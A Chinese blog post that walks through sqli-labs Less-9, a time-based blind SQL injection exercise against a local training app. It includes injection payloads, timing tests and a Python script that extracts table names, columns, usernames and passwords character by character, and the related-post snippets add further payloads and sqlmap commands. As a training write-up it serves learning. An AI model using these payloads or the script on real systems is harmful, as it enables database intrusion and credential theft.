sqlilabs less9

已于 2022-06-27 23:09:12 修改
阅读量210 收藏
点赞数
分类专栏: sqli-labs 文章标签: sql
于 2022-06-27 16:18:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37370714/article/details/125470810
版权

第九关提示是基于时间的盲注,首先先来了解一下必要的函数

sleep(time) 仅在MySQL 5之后可用。等待time那么多秒
在这里插入图片描述

benchmark(count,expr) 重复执行expr count次,用来测试MySql执行表达式的速度。
在这里插入图片描述

if(condition,when_ture,when_false) 如果满足condition,就 执行或打印when_ture,否则就执行或打印when_false
满足condition在这里插入图片描述
不满足condition
在这里插入图片描述

先来判断注入类型
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
用了 1’、1"、1 没有反应,为什么没反应呢,我猜想可能是因为服务器无论正确与否只会发送You are in…这一个数据,所以需要一些方法来发现是否正确,所以就有时间盲注,通过观察等待时间判断正确与否。
猜测可能是这样

if  ((select * from tables where id = value) 有内容)
	print You are in.....
else
	print You are in.....

好了来实践一下
可以看到没有等待时间
在这里插入图片描述
等待了五秒,说明了什么,说明是字符型注入
在这里插入图片描述
先来判断列数
在这里插入图片描述
列数判断完以后就能开始下一步工作了
找到数据库名字长度是8
在这里插入图片描述
找数据库名字
在这里插入图片描述
找表名在这里插入图片描述
属性名和元组值相同
不过手动时间盲注太过于麻烦,可以考虑burp suite,或者手写脚本。

import requests

def zr(url,zrname):
    array1 = "abcdefghijklmnopqrstuvwxyz_-.,"
    proof = "0000ff"
    tmp = zrname
    zrname = ''
    for i in range(1,100):
        url1 = url + str(i) + ',1)=\''
        for s in array1:
            url2 = url1 + s + '\',sleep(0.1),1)%23'
            r = requests.get(url2)
            if proof in r.text:
                zrname += s
    print( tmp + ": " + zrname)


zr('http://localhost/sqlilabs/Less-9/?id=1\' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),','tablename')
zr('http://localhost/sqlilabs/Less-9/?id=1\' and if(substr((select group_concat(column_name) from information_schema.columns where table_name = \'users\'),','columnslist')
zr('http://localhost/sqlilabs/Less-9/?id=1\' and if(substr((select group_concat(username) from users),','usernamelist')
zr('http://localhost/sqlilabs/Less-9/?id=1\' and if(substr((select group_concat(password) from users),','passwordlist')

在这里插入图片描述
啊,为什么判断条件是0000ff
我注意到正确的sql它有个这个
在这里插入图片描述

错误的就没有在这里插入图片描述

总结一下
如果遇到有些情况,页面只有一种结果无法判断正确或者注入类型,就可以用时间盲注来通过等待时间判断正确。

该账号已被注消
关注
专栏目录
SQLi LABS Less-20 Cookie注入
wangyuxiang946的博客
06-23 1万+
SQLi第二十关,sqllabs less-20,sqli-labs less20
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1908
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
sqli-labs 通关教程 Less 9 (时间盲注)
一期一会的博客
12-08 2691
利用正常的语句测试没有任何效果 http://127.0.0.1/sqlilabs/Less-9/?id=1 http://127.0.0.1/sqlilabs/Less-9/?id=1'-- - 数据完成交互后目标网站没有任何的页面回显,这个时候可以使用时间盲注。 http://127.0.0.1/sqlilabs/Less-9/?id=1' and if(1=1,sleep(3),1)-- - //沉睡 http://127.0.0.1/sqlilabs/Less-9/?id=1 a.
SQL注入——sqli-labs-Less-9时间盲注
m0_63563528的博客
04-06 645
时间盲注 和 Bool 盲注很像,区别就是 “参照物” 的不同
sqli-labs Less-9 时间盲注
m0_63711447的博客
04-12 1058
使用的函数补充: if(condition,A,B)如果条件condition为true,则执行语句A,否则执行语句B eg.select if(1>2,3,4); 返回的结果为4(若是在MySQL命令行中使用,应先use xxx数据库) 可组合使用,当前数据库为security ...
sqli-labs-less9
m0_68980215的博客
07-08 201
sql lesson9
sqli-labs(less-9)
不知名白帽的博客
07-14 990
sqli-labs(less-9)。less-9(时间盲注)
网络安全-sqlmap实战之sqlilabs-Less11_less11的sql注入用sqlmap将数据库dump
2401_84248681的博客
04-29 246
错误回显sql语句猜测。
2024年网络安全-sqlmap实战之sqlilabs-Less5_sqlmap打less5,网络安全基础学习教程
最新发布
2401_84253089的博客
05-06 877
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
SQLi-LABS Less-6
m0_64898960的博客
04-13 374
SQLi-LABS Less-6
sqli-labs/Less-9
m0_71299382的博客
11-09 280
sqli-labs第九关
SQL-libs Less-9
AgonYAN的博客
07-12 233
SQL-libs Less-9
sqli-labs:less-9(时间盲注)
羽的博客
07-21 456
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset...
SQL注入——基于时间的盲注(sqli-labs less9)
yuan114012的博客
05-21 1000
一.基于时间得盲注 适用场景:没有数据回显,条件正确与否结果一样 利用方式:构造判断条件,添加sleep,逐个猜测(盲猜) 1.所需语法与函数 IF表达式 IF( expr1 , expr2 , expr3 ) #expr1 的值为 TRUE,则返回值为 expr2 #expr1 的值为FALSE,则返回值为 expr3 expr1 的值为 TRUE,则返回值为 expr2 expr1 的值为FALSE,则返回值为 expr3 mysql> select if(1=1,1,.
sqli-labs less9详解
Brilliant_orange的博客
11-10 1416
【写在前面:建议:如果对SQL注入中SQL语句不熟悉的可以先看看如果看懂了这篇,这题就当应用了】
SQLi LABS Less 9 时间盲注
热门推荐
wangyuxiang946的博客
06-22 1万+
SQLi 第九关,SQLi-LABS Less-9,SQLi-LABS Less 9,SQLiLABS Less9,SQLi Less 9
sqli-labs靶场Less-9
songling515010475的专栏
08-25 169
1、访问首页,/Less-9/index.php?id=1,这里的传参点是id 探测六步 判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 判断是否是延时盲注 http://192.168.60.142:8080/sqlilabs/Less-9/index.php?id=1 ' and sleep(10)-- qwe 分析:通过测试,这里是通过单引号闭合,同时使用延时注入才生效,哪么在以后SQL注入探测时,当前面5.
Sqli-labs之Less-9和Less-10
m0_46315342的博客
06-04 1350
                                          &nbs...
网络安全-sqlmap实战之sqlilabs-Less9
关注网络安全、云原生安全
06-29 1175
类型 时间盲注-单引号 -dbs枚举数据库 使用-o参数优化,,--technique参数指定技术,--batch参数进行跳过 python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" -o --technique T -dbs --batch 过程 python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" --dbms .
sqli labs less 7
07-11
1. 打开 SQLi Labs 平台,并找到 Less 7 的挑战。 2. 分析页面,确定存在注入漏洞的参数或输入框。 3. 尝试在注入点使用 UNION 注入语法。 4. 通过逐渐增加 UNION 查询的列数,直到成功获取到目标信息。 5. 利用 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值